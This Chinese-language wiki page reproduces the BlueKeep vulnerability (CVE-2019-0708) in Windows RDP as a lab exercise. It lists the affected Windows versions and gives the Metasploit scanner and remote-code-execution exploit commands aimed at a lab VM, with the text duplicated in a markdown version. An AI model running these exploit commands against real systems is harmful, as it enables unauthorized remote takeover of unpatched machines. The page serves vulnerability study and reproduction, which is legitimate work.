fofamini-wiki

登录白背景

源码

（CVE-2019-0708） Windows 远程溢出漏洞

一、漏洞简介

Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708。攻击者一旦成功利用该漏洞，便可以在目标系统上执行任意代码，包括获取敏感信息、执行远程代码、发起拒绝服务攻击等等攻击行为。而更加严重的是，这个漏洞的触发无需用户交互，攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒，从而进行大规模传播和破坏。

二、漏洞影响

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

三、复现过程

进入msf、搜索0708

msfconsole
search 0708

使用扫描模块（scanner）

Windows远程溢出漏洞/media/rId24.png)

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip
run

Windows远程溢出漏洞/media/rId25.png)

Windows远程溢出漏洞/media/rId26.png)

使用利用模块（exploit）

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show targets //选择目标主机类型这里我选择了7601 -vmware 15
set target 4
set rhost 192.168.237.131
run

Windows远程溢出漏洞/media/rId27.png)

Windows远程溢出漏洞/media/rId28.png)

Windows远程溢出漏洞/media/rId29.png)

复现成功。

（CVE-2019-0708） Windows 远程溢出漏洞
======================================

一、漏洞简介
------------

二、漏洞影响
------------

Windows 7
Windows Server 2008 R2
Windows Server 2008
Windows 2003
Windows XP

三、复现过程
------------

进入msf、搜索0708

**msfconsole**
**search 0708**

使用扫描模块（scanner）

![20191003195616647.png](./resource/(CVE-2019-0708)Windows远程溢出漏洞/media/rId24.png)

**use auxiliary/scanner/rdp/cve\_2019\_0708\_bluekeep**
**show options**
**set rhost 192.168.237.131 //这里的ip填写自己win7主机的ip**
**run**

![1590935936179.png](./resource/(CVE-2019-0708)Windows远程溢出漏洞/media/rId25.png)

![1590935980644.png](./resource/(CVE-2019-0708)Windows远程溢出漏洞/media/rId26.png)

使用利用模块（exploit）

**use exploit/windows/rdp/cve\_2019\_0708\_bluekeep\_rce**
**show targets //选择目标主机类型 这里我选择了7601 -vmware 15**
**set target 4**
**set rhost 192.168.237.131**
**run**

![1590936148050.png](./resource/(CVE-2019-0708)Windows远程溢出漏洞/media/rId27.png)

![1590936192070.png](./resource/(CVE-2019-0708)Windows远程溢出漏洞/media/rId28.png)

![1590936228779.png](./resource/(CVE-2019-0708)Windows远程溢出漏洞/media/rId29.png)

复现成功。